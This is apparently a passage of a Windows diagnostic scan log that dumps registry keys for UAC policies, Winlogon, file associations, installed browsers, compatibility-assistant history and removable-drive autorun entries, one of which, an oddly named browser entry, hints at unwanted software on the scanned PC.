"EnableUIADesktopToggle"=0   
"EnableVirtualization"=1   
"PromptOnSecureDesktop"=1   
"ValidateAdminCodeSignatures"=0   
"dontdisplaylastusername"=0   
"legalnoticecaption"=   
"legalnoticetext"=   
"scforceoption"=0   
"shutdownwithoutlogon"=1   
"undockwithoutlogon"=1   
"FilterAdministratorToken"=0   

[HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoActiveDesktop"=1   
"NoActiveDesktopChanges"=1   
"ForceActiveDesktopOn"=0   

[HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop]
"NoAddingComponents"=1   
"NoComponents"=1   

[HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel]
"{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}"=1   
"{20D04FE0-3AEA-1069-A2D8-08002B30309D}"=1   
"{208D2C60-3AEA-1069-A2D7-08002B30309D}"=1   
"{871C5380-42A0-1069-A2EA-08002B30309D}"=1   
"{5399E694-6CE5-4D6C-8FCE-1D8870FDCBA0}"=1   
"{59031a47-3f72-44a7-89c5-5595fe6b30ee}"=1   
"{031E4825-7B94-4dc3-B131-E946B44C8DD5}"=1   
"{B4FB3F98-C1EA-428d-A78A-D1F5659CBA93}"=1   
"{9343812e-1c37-4a49-a12e-4b2d810d956b}"=1   

[HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\ClassicStartMenu]
"{871C5380-42A0-1069-A2EA-08002B30309D}.default"=0   
"{9343812e-1c37-4a49-a12e-4b2d810d956b}"=1   

[HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL]
"RegPath"=Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced   
"Text"=@shell32.dll,-30500   
"Type"=radio   
"CheckedValue"=1   
"ValueName"=Hidden   
"DefaultValue"=2   
"HKeyRoot"=2147483649   
"HelpID"=shell.hlp#51105   

[HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer]
"ListViewPopupControl"={8be9f5ea-e746-4e47-ad57-3fb191ca1eed}   
"BrowserCFCreator"={57f8510b-a5e2-41da-a8f0-8a5ae85dfffd}   
"GlobalFolderSettings"={EF8AD2D1-AE36-11D1-B2D2-006097DF8C11}   
"LVPopupSearchControl"={fccf70c8-f4d7-4d8b-8c17-cd6715e37fff}   
"FileOpenDialog"={DC1C5A9C-E88A-4dde-A5A1-60F82A20AEF7}   
"IconUnderline"=2   
"GlobalAssocChangedCounter"=668   

[HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
"TaskbarSizeMove"=0   

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Associations]
"Application"=http://go.microsoft.com/fwlink/?LinkId=57426&Ext=%s   

[HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Policies\System]
"ConsentPromptBehaviorAdmin"=5   
"ConsentPromptBehaviorUser"=3   
"EnableInstallerDetection"=1   
"EnableLUA"=1   
"EnableSecureUIAPaths"=1   
"EnableUIADesktopToggle"=0   
"EnableVirtualization"=1   
"PromptOnSecureDesktop"=1   
"ValidateAdminCodeSignatures"=0   
"dontdisplaylastusername"=0   
"legalnoticecaption"=   
"legalnoticetext"=   
"scforceoption"=0   
"shutdownwithoutlogon"=1   
"undockwithoutlogon"=1   
"FilterAdministratorToken"=0   

[HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoActiveDesktop"=1   
"NoActiveDesktopChanges"=1   
"ForceActiveDesktopOn"=0   

[HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop]
"NoAddingComponents"=1   
"NoComponents"=1   

[HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel]
"{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}"=1   
"{20D04FE0-3AEA-1069-A2D8-08002B30309D}"=1   
"{208D2C60-3AEA-1069-A2D7-08002B30309D}"=1   
"{871C5380-42A0-1069-A2EA-08002B30309D}"=1   
"{5399E694-6CE5-4D6C-8FCE-1D8870FDCBA0}"=1   
"{59031a47-3f72-44a7-89c5-5595fe6b30ee}"=1   
"{031E4825-7B94-4dc3-B131-E946B44C8DD5}"=1   
"{B4FB3F98-C1EA-428d-A78A-D1F5659CBA93}"=1   
"{9343812e-1c37-4a49-a12e-4b2d810d956b}"=1   

[HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\ClassicStartMenu]
"{871C5380-42A0-1069-A2EA-08002B30309D}.default"=0   
"{9343812e-1c37-4a49-a12e-4b2d810d956b}"=1   

[HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL]
"RegPath"=Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced   
"Text"=@shell32.dll,-30500   
"Type"=radio   
"CheckedValue"=1   
"ValueName"=Hidden   
"DefaultValue"=2   
"HKeyRoot"=2147483649   
"HelpID"=shell.hlp#51105   

[HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer]
"ListViewPopupControl"={8be9f5ea-e746-4e47-ad57-3fb191ca1eed}   
"BrowserCFCreator"={57f8510b-a5e2-41da-a8f0-8a5ae85dfffd}   
"GlobalFolderSettings"={EF8AD2D1-AE36-11D1-B2D2-006097DF8C11}   
"LVPopupSearchControl"={fccf70c8-f4d7-4d8b-8c17-cd6715e37fff}   
"FileOpenDialog"={DC1C5A9C-E88A-4dde-A5A1-60F82A20AEF7}   
"IconUnderline"=2   
"GlobalAssocChangedCounter"=237   

[HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
"TaskbarSizeMove"=0   

[HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\Associations]
"Application"=http://go.microsoft.com/fwlink/?LinkId=57426&Ext=%s   


---------- | Winlogon 

[HKU\S-1-5-21-2557276657-2545994043-460956459-1000\Software\Microsoft\Windows NT\CurrentVersion\Winlogon]
"ExcludeProfileDirs"=AppData\Local;AppData\LocalLow;$Recycle.Bin   
"BuildNumber"=7601   
"FirstLogon"=0   
"ParseAutoexec"=1   

[HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon]
"ReportBootOk"=1   
"Shell"=explorer.exe   
"PreCreateKnownFolders"={A520A1A4-1780-4FF6-BD18-167343C5AF16}   
"Userinit"=C:\Windows\system32\userinit.exe,   
"VMApplet"=SystemPropertiesPerformance.exe /pagefile   
"AutoRestartShell"=1   
"Background"=0 0 0   
"CachedLogonsCount"=10   
"DebugServerCommand"=no   
"ForceUnlockLogon"=0   
"LegalNoticeCaption"=   
"LegalNoticeText"=   
"PasswordExpiryWarning"=5   
"PowerdownAfterShutdown"=0   
"ShutdownWithoutLogon"=0   
"WinStationsDisabled"=0   
"DisableCAD"=1   
"scremoveoption"=0   
"ShutdownFlags"=39   

[HKLM\Software\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon]
"ReportBootOk"=1   
"Shell"=explorer.exe   
"PreCreateKnownFolders"={A520A1A4-1780-4FF6-BD18-167343C5AF16}   
"DefaultDomainName"=   
"DefaultUserName"=   
"Userinit"=userinit.exe,   
"VMApplet"=SystemPropertiesPerformance.exe /pagefile   


---------- | Associations

[HKLM\Software\Classes\.exe]
""=exefile   
"Content Type"=application/x-msdownload   

[HKLM\Software\Classes\exefile\Shell\Open\Command]
""="%1" %*   
"IsolatedCommand"="%1" %*   

[HKLM\Software\Classes\.com]
""=comfile   

[HKLM\Software\Classes\comfile\Shell\Open\Command]
""="%1" %*   

[HKLM\Software\Classes\.reg]
""=regfile   

[HKLM\Software\Classes\regfile\Shell\Open\Command]
""=regedit.exe "%1"   

[HKLM\Software\Classes\.scr]
""=scrfile   

[HKLM\Software\Classes\scrfile\Shell\Open\Command]
""="%1" /S   

[HKLM\Software\Classes\.bat]
""=batfile   

[HKLM\Software\Classes\batfile\Shell\Open\Command]
""="%1" %*   

[HKLM\Software\Classes\.cmd]
""=cmdfile   

[HKLM\Software\Classes\cmdfile\Shell\Open\Command]
""="%1" %*   

[HKLM\Software\Classes\.pif]
""=piffile   

[HKLM\Software\Classes\piffile\Shell\Open\Command]
""="%1" %*   

[HKLM\Software\Classes\.inf]
""=inffile   

[HKLM\Software\Classes\inffile\Shell\Open\Command]
""=%SystemRoot%\system32\NOTEPAD.EXE %1   

[HKLM\Software\Classes\.url]
""=InternetShortcut   

[HKLM\Software\Classes\.lnk]
""=lnkfile   

[HKLM\Software\Classes\.hta]
"PerceivedType"=text   
""=htafile   
"Content Type"=application/hta   

[HKLM\Software\Classes\htafile\Shell\Open\Command]
""=C:\Windows\SysWOW64\mshta.exe "%1" %*   

[HKLM\Software\Classes\InternetShortcut]
"NeverShowExt"=   
"InfoTip"=prop:System.Link.TargetUrl;System.Rating;System.Link.Description;System.Link.Comment   
"EditFlags"=2   
"FullDetails"=prop:System.Link.TargetUrl;System.Rating;System.Link.Description;System.Link.Comment   
"IsShortcut"=   
"FriendlyTypeName"=@C:\Windows\System32\ieframe.dll,-10046   
"PreviewDetails"=prop:System.Link.TargetUrl;System.Rating;System.History.VisitCount;System.History.DateChanged;System.Link.DateVisited;System.Link.Description;System.Link.Comment   

[HKLM\Software\Classes\Application.Manifest]
""=Application Manifest   
"EditFlags"=65536   
"BrowserFlags"=4096   
"FriendlyTypeName"=@dfshim.dll,-200   

[HKLM\Software\Classes\Application.Reference]
"NeverShowExt"=   
""=Application Reference   
"IsShortcut"=   
"EditFlags"=131072   
"FriendlyTypeName"=@dfshim.dll,-201   

[HKLM\Software\Classes\Folder]
"ContentViewModeLayoutPatternForBrowse"=delta   
"ContentViewModeForBrowse"=prop:~System.ItemNameDisplay;~System.LayoutPattern.PlaceHolder;~System.LayoutPattern.PlaceHolder;~System.LayoutPattern.PlaceHolder;System.DateModified   
"ContentViewModeLayoutPatternForSearch"=alpha   
"ContentViewModeForSearch"=prop:~System.ItemNameDisplay;System.DateModified;~System.ItemFolderPathDisplay   
""=Folder   
"EditFlags"=0xD2030000   
"FullDetails"=prop:System.PropGroup.Description;System.ItemNameDisplay;System.ItemTypeText;System.Size   
"NoRecentDocs"=   
"ThumbnailCutoff"=0   
"TileInfo"=prop:System.Title;System.ItemTypeText   

[HKLM\Software\WOW6432Node\Classes\.exe]
""=exefile   
"Content Type"=application/x-msdownload   

[HKLM\Software\WOW6432Node\Classes\exefile\Shell\Open\Command]
""="%1" %*   
"IsolatedCommand"="%1" %*   

[HKLM\Software\WOW6432Node\Classes\.com]
""=comfile   

[HKLM\Software\WOW6432Node\Classes\comfile\Shell\Open\Command]
""="%1" %*   

[HKLM\Software\WOW6432Node\Classes\.reg]
""=regfile   

[HKLM\Software\WOW6432Node\Classes\regfile\Shell\Open\Command]
""=regedit.exe "%1"   

[HKLM\Software\WOW6432Node\Classes\.scr]
""=scrfile   

[HKLM\Software\WOW6432Node\Classes\scrfile\Shell\Open\Command]
""="%1" /S   

[HKLM\Software\WOW6432Node\Classes\.bat]
""=batfile   

[HKLM\Software\WOW6432Node\Classes\batfile\Shell\Open\Command]
""="%1" %*   

[HKLM\Software\WOW6432Node\Classes\.cmd]
""=cmdfile   

[HKLM\Software\WOW6432Node\Classes\cmdfile\Shell\Open\Command]
""="%1" %*   

[HKLM\Software\WOW6432Node\Classes\.pif]
""=piffile   

[HKLM\Software\WOW6432Node\Classes\piffile\Shell\Open\Command]
""="%1" %*   

[HKLM\Software\WOW6432Node\Classes\.inf]
""=inffile   

[HKLM\Software\WOW6432Node\Classes\inffile\Shell\Open\Command]
""=%SystemRoot%\system32\NOTEPAD.EXE %1   

[HKLM\Software\WOW6432Node\Classes\.url]
""=InternetShortcut   

[HKLM\Software\WOW6432Node\Classes\.lnk]
""=lnkfile   

[HKLM\Software\WOW6432Node\Classes\.hta]
"PerceivedType"=text   
""=htafile   
"Content Type"=application/hta   

[HKLM\Software\WOW6432Node\Classes\htafile\Shell\Open\Command]
""=C:\Windows\SysWOW64\mshta.exe "%1" %*   

[HKLM\Software\WOW6432Node\Classes\InternetShortcut]
"NeverShowExt"=   
"InfoTip"=prop:System.Link.TargetUrl;System.Rating;System.Link.Description;System.Link.Comment   
"EditFlags"=2   
"FullDetails"=prop:System.Link.TargetUrl;System.Rating;System.Link.Description;System.Link.Comment   
"IsShortcut"=   
"FriendlyTypeName"=@C:\Windows\System32\ieframe.dll,-10046   
"PreviewDetails"=prop:System.Link.TargetUrl;System.Rating;System.History.VisitCount;System.History.DateChanged;System.Link.DateVisited;System.Link.Description;System.Link.Comment   

[HKLM\Software\WOW6432Node\Classes\Application.Manifest]
""=Application Manifest   
"EditFlags"=65536   
"BrowserFlags"=4096   
"FriendlyTypeName"=@dfshim.dll,-200   

[HKLM\Software\WOW6432Node\Classes\Application.Reference]
"NeverShowExt"=   
""=Application Reference   
"IsShortcut"=   
"EditFlags"=131072   
"FriendlyTypeName"=@dfshim.dll,-201   

[HKLM\Software\WOW6432Node\Classes\Folder]
"ContentViewModeLayoutPatternForBrowse"=delta   
"ContentViewModeForBrowse"=prop:~System.ItemNameDisplay;~System.LayoutPattern.PlaceHolder;~System.LayoutPattern.PlaceHolder;~System.LayoutPattern.PlaceHolder;System.DateModified   
"ContentViewModeLayoutPatternForSearch"=alpha   
"ContentViewModeForSearch"=prop:~System.ItemNameDisplay;System.DateModified;~System.ItemFolderPathDisplay   
""=Folder   
"EditFlags"=0xD2030000   
"FullDetails"=prop:System.PropGroup.Description;System.ItemNameDisplay;System.ItemTypeText;System.Size   
"NoRecentDocs"=   
"ThumbnailCutoff"=0   
"TileInfo"=prop:System.Title;System.ItemTypeText   

[HKLM\Software\Clients\StartMenuInternet\FIREFOX.EXE\Shell\open\Command]
""=C:\Program Files (x86)\Mozilla Firefox\firefox.exe   [07/11/2014 11:39:56]
[HKLM\Software\Clients\StartMenuInternet\FIREFOX.EXE\InstallInfo]
"ReinstallCommand"="C:\Program Files (x86)\Mozilla Firefox\uninstall\helper.exe" /SetAsDefaultAppGlobal

[HKLM\Software\Clients\StartMenuInternet\Google Chrome\Shell\open\Command]
""="C:\Program Files (x86)\Google\Chrome\Application\chrome.exe"   
[HKLM\Software\Clients\StartMenuInternet\Google Chrome\InstallInfo]
"ReinstallCommand"="C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --make-default-browser

[HKLM\Software\Clients\StartMenuInternet\IEXPLORE.EXE\Shell\open\Command]
""=C:\Program Files (x86)\Internet Explorer\iexplore.exe   [20/01/2017 21:33:41]
[HKLM\Software\Clients\StartMenuInternet\IEXPLORE.EXE\InstallInfo]
"ReinstallCommand"="C:\Windows\System32\ie4uinit.exe" -reinstall

[HKLM\Software\Clients\StartMenuInternet\OperaStable\Shell\open\Command]
""="C:\Program Files (x86)\Opera\Launcher.exe"   
[HKLM\Software\Clients\StartMenuInternet\OperaStable\InstallInfo]
"ReinstallCommand"="C:\Program Files (x86)\Opera\Launcher.exe" --makedefaultbrowser

[HKLM\Software\Clients\StartMenuInternet\peaeLlz\Shell\open\Command]
""=   
[HKLM\Software\Clients\StartMenuInternet\peaeLlz\InstallInfo]
"ReinstallCommand"="C:\Program Files (x86)\peaeLlz\peaeLlz\chrome.exe" "-ReinstallCommand"

[HKLM\Software\WOW6432Node\Clients\StartMenuInternet\FIREFOX.EXE\Shell\open\Command]
""=C:\Program Files (x86)\Mozilla Firefox\firefox.exe   [07/11/2014 11:39:56]
[HKLM\Software\WOW6432Node\Clients\StartMenuInternet\FIREFOX.EXE\InstallInfo]
"ReinstallCommand"="C:\Program Files (x86)\Mozilla Firefox\uninstall\helper.exe" /SetAsDefaultAppGlobal

[HKLM\Software\WOW6432Node\Clients\StartMenuInternet\Google Chrome\Shell\open\Command]
""="C:\Program Files (x86)\Google\Chrome\Application\chrome.exe"   
[HKLM\Software\WOW6432Node\Clients\StartMenuInternet\Google Chrome\InstallInfo]
"ReinstallCommand"="C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --make-default-browser

[HKLM\Software\WOW6432Node\Clients\StartMenuInternet\IEXPLORE.EXE\Shell\open\Command]
""=C:\Program Files (x86)\Internet Explorer\iexplore.exe   [20/01/2017 21:33:41]
[HKLM\Software\WOW6432Node\Clients\StartMenuInternet\IEXPLORE.EXE\InstallInfo]
"ReinstallCommand"="C:\Windows\System32\ie4uinit.exe" -reinstall

[HKLM\Software\WOW6432Node\Clients\StartMenuInternet\OperaStable\Shell\open\Command]
""="C:\Program Files (x86)\Opera\Launcher.exe"   
[HKLM\Software\WOW6432Node\Clients\StartMenuInternet\OperaStable\InstallInfo]
"ReinstallCommand"="C:\Program Files (x86)\Opera\Launcher.exe" --makedefaultbrowser

[HKLM\Software\WOW6432Node\Clients\StartMenuInternet\peaeLlz\Shell\open\Command]
""=   
[HKLM\Software\WOW6432Node\Clients\StartMenuInternet\peaeLlz\InstallInfo]
"ReinstallCommand"="C:\Program Files (x86)\peaeLlz\peaeLlz\chrome.exe" "-ReinstallCommand"


---------- | AppcompatFlags

[HKU\S-1-5-21-2557276657-2545994043-460956459-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\Persisted]
"SIGN.MEDIA=67BCE DRP13-R390-DVD\DriverPackSolution.exe"=1
"SIGN.MEDIA=E48A18 Outils\compresseur wrar\WINRAR_3.42_FR.EXE"=1
"SIGN.MEDIA=910A8F1D Outils\InTerNet\flashplayer_15_ax_debug.exe"=1
"SIGN.MEDIA=910A8F1D Outils\InTerNet\Firefox Setup 33.0 Fr.exe"=1
"SIGN.MEDIA=2141832 Outils\cHaT\SkypeSetupFull.exe"=1
"SIGN.MEDIA=F00FB9A Outils\audio et video\vlc-2.0.5-win32.exe"=1
"SIGN.MEDIA=F00FB9A Outils\audio et video\RealPlayer.exe"=1
"SIGN.MEDIA=2B82C4E Outils\Nero Reloaded\nero-8.3.13.0 Lite Multilingual full\nero-8.3.6.0_europe_lite.exe"=1
"SIGN.MEDIA=2B82C4E Outils\Nero Reloaded\nero-8.3.13.0 Lite Multilingual full\Nero 8.3.6 Activation patch.exe"=1
"SIGN.MEDIA=4BC4898 Outils\acrobat reader\AdbeRdr1001_fr_FR.exe"=1
"SIGN.MEDIA=9DBAD Outils\Office2007\SETUP.EXE"=1
"SIGN.MEDIA=BA176A3 Outils\antivirus\avast 6.0\avast_free_antivirus_setup.exe"=1
"SIGN.MEDIA=DE3C7D28 Setup.exe"=1
"D:\[R.G. Mechanics] The Elder Scrolls V - Skyrim - Legendary Edition\setup.exe"=1
"SIGN.MEDIA=D2897BFE Setup.exe"=1
"SIGN.MEDIA=54A5B4DB setup.exe"=1
"SIGN.MEDIA=16E6A90E setup.exe"=1
"SIGN.MEDIA=D1D90120 Install.exe"=1
"SIGN.MEDIA=2ED6AC12 this_war_of_mine_drmfree.exe"=1
"C:\Users\PC\Downloads\chromeinstall-8u25.exe"=1
"SIGN.MEDIA=8EDD5BC9 Setup.exe"=1
"C:\Users\PC\Downloads\SteamSetup.exe"=1
"SIGN.MEDIA=DFDCDB9 FairLight\Installer.exe"=1
"SIGN.MEDIA=4A345F51 SETUP.EXE"=1
"SIGN.MEDIA=47FBF84B setup.exe"=1
"SIGN.MEDIA=647C71C setup.exe"=1
"C:\Users\PC\Downloads\3DRipperDXSetup.exe"=1
"C:\Users\PC\Downloads\LeagueofLegends_EUW_Installer_9_15_2014.exe"=1
"SIGN.MEDIA=E4538E1C Setup.exe"=1
"C:\Users\PC\Downloads\World-of-Warcraft-Setup-frFR.exe"=1
"SIGN.MEDIA=6FF273C7 Setup.exe"=1
"C:\Users\PC\Downloads\dotNetFx45_Full_setup.exe"=1
"SIGN.MEDIA=BEA1AD Autorun.exe"=1
"SIGN.MEDIA=4EAB6 Autorun.exe"=1
"D:\Minecraft 1.7.2 Cracked [Full Installer] [Online] [Server List]\Minecraft 1.7.2.exe"=1
"D:\The Saboteur [R.G. Games]\Setup.exe"=1
"D:\L.A. Noire - The Complete Edition\setup.exe"=1
"C:\Users\PC\Downloads\wt_launcher_1.0.1.473.exe"=1
"C:\Users\PC\Downloads\GameRangerSetup.exe"=1
"C:\Users\PC\Downloads\ZHPDiag2.exe"=1
"C:\Users\PC\Downloads\mbam-setup-2.0.4.1028.exe"=1
"C:\Users\PC\Downloads\ccsetup501.exe"=1
"C:\Users\PC\Downloads\Nexus Mod Manager-0.53.2.exe"=1
"C:\Users\PC\Downloads\chromeinstall-8u31.exe"=1
"SIGN.MEDIA=1EA2BD56 setup.exe"=1
"C:\Users\PC\Downloads\GTSetup (1).exe"=1
"C:\Users\PC\Downloads\LeagueofLegends_EUW_Installer_9_15_2014 (1).exe"=1
"SIGN.MEDIA=FF53E979 setup.exe"=1
"SIGN.MEDIA=8C8F0858 SETUP.EXE"=1
"SIGN.MEDIA=B6301CC2 Autorun.exe"=1
"SIGN.MEDIA=185800 Setup.exe"=1
"SIGN.MEDIA=4DC130E2 setup.exe"=1
"C:\Program Files (x86)\WinRAR\uninstall.exe"=1
"SIGN.MEDIA=DAEAC6B5 setup.exe"=1
"SIGN.MEDIA=EEBD4D98 setup.exe"=1
"SIGN.MEDIA=198699DA setup.exe"=1
"C:\Program Files\Nexus Mod Manager\uninstall\unins000.exe"=1
"SIGN.MEDIA=200 Setup.exe"=1
"SIGN.MEDIA=647C71C AutoRun.exe"=8
"C:\AMD\AMD-Catalyst-Omega-14.12-With-DOTNet45-Win7-64bit\Packages\Apps\VC12RTx64\vcredist_x64\vcredist_x64.exe"=1
"C:\AMD\AMD-Catalyst-Omega-14.12-With-DOTNet45-Win7-64bit\Packages\Apps\Raptr\RaptrInstaller\amd_ge_installer.exe"=1
"SIGN.MEDIA=FFCCCD72 setup.exe"=1
"SIGN.MEDIA=589A22B8 Setup.exe"=1
"SIGN.MEDIA=3BA16CF6 autoplay.exe"=1
"SIGN.MEDIA=71CBD1 Setup.exe"=1
"SIGN.MEDIA=42FA68BF setup.exe"=1
"SIGN.MEDIA=C4508B6B Autorun.exe"=1
"SIGN.MEDIA=101837D setup_world_in_conflict_2.0.0.3.exe"=1
"SIGN.MEDIA=D13700A8 autoplay.exe"=1
"D:\DDAY\Setup.exe"=1
"D:\DDAY\Crack\Patches\IF44Patch_1.00-1.03_DISK.exe"=1
"D:\Democracy\Way of the Samurai 3 [FitGirl Repack]\setup.exe"=1
"D:\Democracy\Way.of.the.Samurai.4-GOG\setup_way_of_the_samurai4_2.0.0.2.exe"=1
"D:\Democracy\Europa.Universalis.IV.Mare.Nostrum.v1.16.2.Update-SKIDROW\Europa.Universalis IV.Mare.Nostrum.v1.16.2.Update.exe"=1
"C:\Program Files (x86)\Internet Download Manager\Uninstall.exe"=1
"D:\Tropico\Setup.exe"=1
"C:\Users\PC\Downloads\Programs\FreeArc-0.666-win32.exe"=1
"C:\Program Files (x86)\Modem HDM EC156\AutoRun\AutoRunSetup.exe"=1
"D:\Tropico\GTA IV - Patch 1.0.7.0 + Crack_Only + Tradução PT-BR\Patch\UpdateTitle.exe"=1
"D:\LCPDFR\English\1. LCPD First Response 1.1 Installer.exe"=1
"D:\Europa\Assassin`s Creed III_[R.G. Catalyst]\Setup.exe"=1
"D:\Empire\Setup.exe"=1
"D:\Europa\Civilization V Complete Addition repack Mr DJ\Setup.exe"=1
"C:\Program Files (x86)\Steam\bin\steamservice.exe"=1
"D:\911 First Responders\setup.exe"=1
"D:\Emergency 2013\setup.exe"=1
"SIGN.MEDIA=326540 autorun.exe"=1
"SIGN.MEDIA=963231A2 setup.exe"=1
"D:\Mflight morocco\royal_air_maroc_fleet.exe"=1
"D:\Euro Truck\Euro Truck Simulator 2 [FitGirl Repack]\setup.exe"=1
"SIGN.MEDIA=97668DA4 setup.exe"=1
"SIGN.MEDIA=A565241B setup.exe"=1
"SIGN.MEDIA=E5A8827A setup.exe"=1
"D:\Crusader Kings II Monks and Mystics\unins000.exe"=1
"SIGN.MEDIA=79E8F044 Setup.exe"=1
"SIGN.MEDIA=68EF17DB setup.exe"=1
"SIGN.MEDIA=37AD8138 setup.exe"=1
"SIGN.MEDIA=C35DD390 setup.exe"=1
"SIGN.MEDIA=46735869 setup.exe"=1
"C:\Program Files (x86)\Common Files\DVDVideoSoft\lib\Uninstall.exe"=32
"SIGN.MEDIA=4B2977F8 setup.exe"=1
"SIGN.MEDIA=60F620AB setup.exe"=1

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\Persisted]
"C:\Program Files (x86)\Opera\Launcher.exe"=32


---------- | IFEO


---------- | Mountpoints2

[HKU\S-1-5-21-2557276657-2545994043-460956459-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Mountpoints2\{4c7de0fd-306b-11e5-af2a-002564c1926c}] : F:\Système_Windows\Installer.exe     (AutoRun)
[HKU\S-1-5-21-2557276657-2545994043-460956459-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Mountpoints2\{534ede85-320f-11e5-99ea-002564c1926c}] : F:\Système_Windows\Installer.exe     (AutoRun)
[HKU\S-1-5-21-2557276657-2545994043-460956459-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Mountpoints2\{5872d287-669d-11e4-bbd8-002564c1926c}] : G:\setup.exe     (AutoRun)
[HKU\S-1-5-21-2557276657-2545994043-460956459-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Mountpoints2\{78e99cbf-6e7c-11e5-98f7-002564c1926c}] : F:\Système_Windows\Installer.exe     (AutoRun)
[HKU\S-1-5-21-2557276657-2545994043-460956459-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Mountpoints2\{9156f06a-44eb-11e6-a8c3-002564c1926c}] : F:\AutoRun.exe     (AutoRun)
[HKU\S-1-5-21-2557276657-2545994043-460956459-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Mountpoints2\{9156f06d-44eb-11e6-a8c3-002564c1926c}] : F:\AutoRun.exe     (AutoRun)
[HKU\S-1-5-21-2557276657-2545994043-460956459-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Mountpoints2\{c268fe30-666b-11e4-81dd-806e6f6e6963}] : E:\Autorun.exe     (AutoRun)
[HKU\S-1-5-21-2557276657-2545994043-460956459-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Mountpoints2\{fd034a5e-312e-11e5-b3fb-002564c1926c}] : F:\Système_Windows\Installer.exe     (AutoRun)
[HKU\S-1-5-21-2557276657-2545994043-460956459-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Mountpoints2\{fd034a6b-312e-11e5-b3fb-002564c1926c}] : F:\Système_Windows\Installer.exe     (AutoRun)

---------- | Windows

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\IniFileMapping\win.ini\Windows]
"MouseSpeed"=#USR:Control Panel\Mouse   
"MouseThreshold1"=#USR:Control Panel\Mouse   
"MouseThreshold2"=#USR:Control Panel\Mouse   
"SwapMouseButtons"=#USR:Control Panel\Mouse   
"Beep"=#USR:Control Panel\Sound   
"DoubleClickSpeed"=#USR:Control Panel\Mouse   
"CoolSwitch"=USR:Control Panel\Desktop   
"DoubleClickHeight"=#USR:Control Panel\Mouse   
"DoubleClickWidth"=#USR:Control Panel\Mouse   
"DragFullWindows"=USR:Control Panel\Desktop   
"InitialKeyboardIndicators"=USR:Control Panel\Keyboard   
"LowPowerActive"=#USR:Control Panel\Desktop   
"LowPowerTimeOut"=#USR:Control Panel\Desktop   
"PowerOffActive"=#USR:Control Panel\Desktop   
"PowerOffTimeOut"=#USR:Control Panel\Desktop   
"ScreenSaveActive"=#USR:Control Panel\Desktop   
"ScreenSaveTimeOut"=#USR:Control Panel\Desktop   
"SnapToDefaultButton"=#USR:Control Panel\Mouse   
""=USR:Software\Microsoft\Windows NT\CurrentVersion\Windows   
"Spooler"=#SYS:Microsoft\Windows NT\CurrentVersion\Windows   
"TRANSMISSIONRETRYTIMEOUT"=#SYS:MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS   
"DEFAULTSEPARATEVDM"=\\REGISTRY\\MACHINE\\SYSTEM\\CURRENTCONTROLSET\\CONTROL\\WOW   
"APPINIT_DLLS"=SYS:MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS   
"DEVICENOTSELECTEDTIMEOUT"=#SYS:MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS   
"SWAPDISK"=SYS:MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS   

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\IniFileMapping\system.ini\Boot]
""=SYS:Microsoft\Windows NT\CurrentVersion\WOW\boot   
"ScreenSaverActive"=USR:Control Panel\Desktop   
"ScreenSaverIsSecure"=USR:Control Panel\Desktop   
"SCRNSAVE.EXE"=USR:Control Panel\Desktop   
"Shell"=SYS:Microsoft\Windows NT\CurrentVersion\Winlogon   

[HKLM\Software\WOW6432Node\Microsoft\Windows NT\CurrentVersion\IniFileMapping\win.ini\Windows]
"MouseSpeed"=#USR:Control Panel\Mouse   
"MouseThreshold1"=#USR:Control Panel\Mouse   
"MouseThreshold2"=#USR:Control Panel\Mouse   
"SwapMouseButtons"=#USR:Control Panel\Mouse   
"Beep"=#USR:Control Panel\Sound   
"DoubleClickSpeed"=#USR:Control Panel\Mouse   
"CoolSwitch"=USR:Control Panel\Desktop   
"DoubleClickHeight"=#USR:Control Panel\Mouse   
"DoubleClickWidth"=#USR:Control Panel\Mouse   
"DragFullWindows"=USR:Control Panel\Desktop   
"InitialKeyboardIndicators"=USR:Control Panel\Keyboard   
